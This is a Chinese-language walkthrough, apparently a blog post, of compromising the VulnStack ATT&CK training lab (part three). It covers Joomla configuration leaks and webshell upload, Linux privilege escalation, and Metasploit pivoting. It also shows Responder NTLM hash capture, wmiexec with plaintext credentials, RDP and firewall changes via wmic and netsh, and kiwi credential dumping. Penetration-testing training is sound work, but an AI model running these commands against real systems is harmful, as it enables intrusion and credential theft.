红日安全 ATT&CK VulnStack靶场(三)
0x00 前言
内网真的有点难搞,总是会碰到一些奇怪的问题。。。基础不难,地动山摇。
不知道原版哪下的,就放个自己云盘的,这玩意压缩后只有20G
,解压后有100G
…
放个下载地址:提取码: uecu
拓扑图如下
除了centos
的出口网卡的IP
是需要调整外,其余网卡都不需要调整。
0x01 Web
打点
直接访问网站
发现很熟悉,joomla cms
,国外比较有名的cms
,直接上工具,kali
里面带的joomscan
[+] FireWall Detector
[++] Firewall not detected[+] Detecting Joomla Version
[++] Joomla 3.9.12[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable[+] Checking Directory Listing
[++] directory has directory listing :
http://10.1.1.196/administrator/components
http://10.1.1.196/administrator/modules
http://10.1.1.196/administrator/templates
http://10.1.1.196/images/banners[+] Checking apache info/status files
[++] Readable info/status files are not found[+] admin finder
[++] Admin page : http://10.1.1.196/administrator/[+] Checking robots.txt existing
[++] robots.txt is found
path : http://10.1.1.196/robots.txt Interesting path found from robots.txt
http://10.1.1.196/joomla/administrator/
http://10.1.1.196/administrator/
http://10.1.1.196/bin/
http://10.1.1.196/cache/
http://10.1.1.196/cli/
http://10.1.1.196/components/
http://10.1.1.196/includes/
http://10.1.1.196/installation/
http://10.1.1.196/language/
http://10.1.1.196/layouts/
http://10.1.1.196/libraries/
http://10.1.1.196/logs/
http://10.1.1.196/modules/
http://10.1.1.196/plugins/
http://10.1.1.196/tmp/[+] Finding common backup files name
[++] Backup files are not found[+] Finding common log files name
[++] error log is not found[+] Checking user registration
[++] registration is enabled
http://10.1.1.196/index.php?option=com_users&view=registration[+] Checking sensitive config.php.x file
[++] Readable config file is found config file path : http://10.1.1.196/configuration.php~
版本还挺高的,查找了下,已知漏洞CVE-2021-23132
需要有管理员账号才可以getshell
。
这里面的信息看了一圈后,发现有配置文件信息泄露,访问http://10.1.1.196/configuration.php~
发现有数据库用户名密码,telnet
测试下端口是否开放
可以看到mysql
端口3306
可以正常连接,用工具navicat
连接,可惜用户不是管理员权限无法getshell
,只能翻信息了。
在表中发现用户信息表am2zu_users
存在管理员信息,但是密码解不出来,但是像这种CMS
官网一般都有解决办法
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
直接将值进行修改即可找回密码,密码为secret
成功进入后台,接下找模板或者插件之类的地址插马getshell
就好了,当然我这里直接使用exp
打了。
这里从github
上找的,然后改了下payload
,成功获取shell
由于是php7
的,使用蚁剑连接,但是发现无法执行命令
大概是disable_function
造成的,检查phpinfo
可以看到过滤了常见的命令执行函数,这里用最简单的方法进行bypass
,用蚁剑的插件搞定。
下载地址https://github.com/AntSword-Store
,安装在antSword\antData\plugins\
目录下即可
选择这两个都可以正常使用
正常执行命令,接下来就想上传马弹到msf
上去了,但是发现马根本连不上。仔细一下,IP
地址不对
这明显是个在其它网段的地址,并且还是一台不出网的服务器,由另外一台主机进行了反向代理。这里在思考解决问题的时候,在/tmp
目录下发现了一个文件。
www-data:/var/www/html/templates/protostar) $ cat /tmp/mysql/test.txt
adduser wwwuser
passwd wwwuser_123Aqx
(www-data:/var/www/html/templates/protostar) $
发现是增加用户的命令,但是在本机没有此用户,看来这个用户应该是其它主机的了,试了下,直接就ssh
上了
接下来就可以传马进行msf
上线了。在上线前,我用dirtycow
和CVE-2021-3493
分别将centos
和ubuntu
提权成功,但是这个好像对后续实验没啥影响,可以先放放,啥时候提都可以。
这里正常上线后,添加内网路由meterpreter
下使用run post/multi/manage/autoroute
,可以看到路由正常添加
到此web
打点这一方面结束。
0x02 内网渗透
接下来就需要做内网的信息收集了,先查看存活主机use auxiliary/scanner/discovery/udp_probe
发现有三台主机存活,接着查看三台主机的开放端口情况
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.93.10,20,30
rhosts => 192.168.93.10,20,30
msf6 auxiliary(scanner/portscan/tcp) > exploit
[+] 192.168.93.20: - 192.168.93.20:80 - TCP OPEN
[+] 192.168.93.30: - 192.168.93.30:135 - TCP OPEN
[+] 192.168.93.30: - 192.168.93.30:139 - TCP OPEN
[+] 192.168.93.20: - 192.168.93.20:135 - TCP OPEN
[+] 192.168.93.20: - 192.168.93.20:139 - TCP OPEN
[+] 192.168.93.30: - 192.168.93.30:445 - TCP OPEN
[+] 192.168.93.20: - 192.168.93.20:445 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:53 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:88 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:135 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:139 - TCP OPEN
[+] 192.168.93.20: - 192.168.93.20:1433 - TCP OPEN
[+] 192.168.93.20: - 192.168.93.20:2383 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:389 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:445 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:464 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:593 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:636 - TCP OPEN
[*] 192.168.93.10,20,30: - Scanned 1 of 3 hosts (33% complete)
[*] 192.168.93.10,20,30: - Scanned 2 of 3 hosts (66% complete)
[*] 192.168.93.10,20,30: - Scanned 2 of 3 hosts (66% complete)
[*] 192.168.93.10,20,30: - Scanned 2 of 3 hosts (66% complete)
[*] 192.168.93.10,20,30: - Scanned 2 of 3 hosts (66% complete)
[*] 192.168.93.10,20,30: - Scanned 2 of 3 hosts (66% complete)
[+] 192.168.93.10: - 192.168.93.10:3269 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:3268 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:5985 - TCP OPEN
[+] 192.168.93.10: - 192.168.93.10:9389 - TCP OPEN
[*] 192.168.93.10,20,30: - Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
可以看到三台都是windows
,并且10
主机开了53
端口,大概就是域控了,其中还有一些88,80
端口访问了下,都没什么直接可以利用的信息。
这里看到了都开了445
,于是尝试了下永恒之蓝,未果。并且也没什么好可以直接利用的漏洞的。
有两个思路,一个是在域当中进行smb
爆破,另外一个就是利用开放的1433
端口的mssql
,经过测试后,mssql
可以登陆的密码是和之前找到的mysql
密码,但是这里的账号没有权限,无法getshell
,也无法直接提权。
这里使用Responder.py来伪造smb
服务器来获取hash
,然后利用mssql
来进行触发验证
先将工具传到centos
上,运行脚本python Responder.py -I eth1 -wrf
然后接着在msf
触发验证
触发验证后,可以看到,已经成功抓到ntml hash
接着将hash
进行暴力破解,用hashcat
或者john
都可以
密码成功获取到,接到可以使用工具wmiexec.py来进行获取cmd
,执行前,先在msf
中开启socks
,然后利用proxychains
来进行执行命令。
proxychains python wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
成功登陆,由于只有CMD
,并且不出网,想上传文件这里只想到了开启3389
后,用远程桌面来传。
#开远程桌面功能
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#防火墙旅行
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
开启了远程桌面后,通过socks
代理正常连接
上传了一个msf
马进行监听7777
端口
在msf
中通过bind_tcp
正常上线
接着加载kiwi
模块,使用creds_kerberos
查看凭证
meterpreter > load kiwi
meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TEST.ORG zxcASDqw123!!
Administrator WIN2008 123qwe!ASD
...
抓取到了TEST.ORG\Administrator
的密码为zxcASDqw123!!
,接下查找域控
域控为10
主机,接下来再使用相同的方法进行登陆域控,即可拿下
红日安全 ATT&CK VulnStack靶场(三)相关推荐
- VulnStack靶场二
ATT&CK红队评估实战靶场二 0x00 靶场搭建 防火墙策略 虚拟机快照版本 web主机运行weblogic启动脚本 问题:net view 显示 6118 error 拓展:windows ...
- ATT CK 阶段之Initial Access --Exploit Public-Facing Application
Exploit Public-Facing Application:即攻击对外开放的服务.这些服务通常为Web,也可能是数据库.标准服务如SMB.SSH 或者其他通过sockets能访问到的服务. 可 ...
- 红日安全ATT&CK靶机实战系列之vulnstack2
typora-root-url: pic\ATT&CK靶机实战系列--vulnstack2 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http:// ...
- 红日安全ATT&CK靶机实战系列之vulnstack7
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 边下载着,可以 ...
- VulnStack-ATTCK-3(红日靶场三)
VulnStack-ATT&CK-3 1. 环境配置 2. 信息收集 目标机端口扫描 目录扫描 3. 漏洞利用 远程连接web的MySQL 登录后台写一句话木马 连接木马文件getshell ...
- 内网渗透—红日靶场三
文章目录 0x01.环境配置 0x02.Centos getshell 0x03.Centos提权 0x04.内网穿透-设置路由 0x05.内网穿透-设置代理 0x06.获取内网目标shell 通过s ...
- 攻防演练-某地级市HW攻防测试演练红队渗透测试总结
某地级市HW攻防演练红队渗透测试总结 文章目录 某地级市HW攻防演练红队渗透测试总结 前言 一.对某目标攻击的复盘 1.Web打点 2.上免杀马反弹shell(Failed) 3.信息收集,数据库提权 ...
- 【赠书】《ATT&CK框架实践指南》
在网络安全领域,攻击者始终拥有取之不竭.用之不尽的网络弹药,可以对组织机构随意发起攻击:而防守方则处于敌暗我明的被动地位,用有限的资源去对抗无限的安全威胁,而且每次都必须成功地阻止攻击者的攻击.基于这 ...
- 内网中CobaltStrike4.0(CS4)的渗透之旅
前言 这是老以前做的一个,主要熟悉一下cs4的新特性,还是发出来看看吧,流程简单一些,但是内网流程还是比较完整的.大家可以看看 本次靶机为红日安全的ATT&CK第五个靶场. http://vu ...
最新文章
- 开始VC之路--创建窗体
- Nagios监控Linux系统
- python 单一进程实例 实现
- 【工业控制】PolyWorks培训教程-PCB字符机平行度和垂直度
- alpine linux 源码安装,关于docker:如何安装Go in alpine linux
- 工业以太网交换机的三种转发方式
- sql server 2008 的安装
- C#序列化与反序列化方式简单总结
- 拓端tecdat|用R语言制作交互式图表和地图
- Linux部署之批量自动安装系统之测试篇
- 什么是OFD格式文档?一文教你读懂OFD格式文档
- Linux#使用ll命令
- 180422 3步法Windows10引导Ubuntu开机启动
- VB程序设计教程(第四版)龚沛曾 实验8-2
- 11个开源测试自动化框架,如何选?
- 转:成功的背后!(给所有IT人)
- ojbk的sas proc 过程之transpose
- fmri与GLM应用
- Simulink代码生成:生成C++类
- 乐优商场开发第五天笔记
热门文章
- vue-cli4引入Element Plus 插件
- 什么是IP?IP为什么要隔离?浏览器如何实现IP隔离?
- oracle销售订单导入错误,通过传XML格式导入到ORACLE的销售订单
- c++filt解码已损坏的函数名称
- 在Silverlight 2 beta1中使用IronPython等动态语言
- 我们的竞争对手在看向哪里---对勺海公众号的挖掘与细分
- Pandas+Pyecharts | 某APP大学生用户数据分析可视化
- python爬取饿了么评论_python爬取饿了么的实例
- 你不可能成为一个死理性派
- 小米 红米手机安装证书报错 无法安装该证书 因为无法读取该证书文件